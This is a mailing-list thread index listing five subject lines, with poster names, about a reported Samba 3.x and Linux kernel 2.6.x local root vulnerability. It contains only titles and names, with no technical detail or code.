- Re: Samba 3.x + kernel 2.6.x local root vulnerability (Seth Arnold
) - Re: Samba 3.x + kernel 2.6.x local root vulnerability (Michael Kjorling
) - Re: Samba 3.x + kernel 2.6.x local root vulnerability ("Patrick J. Volkerding"
) - Re: Samba 3.x + kernel 2.6.x local root vulnerability (Urban Widmark
) - Samba 3.x + kernel 2.6.x local root vulnerability (Michal Medvecky
)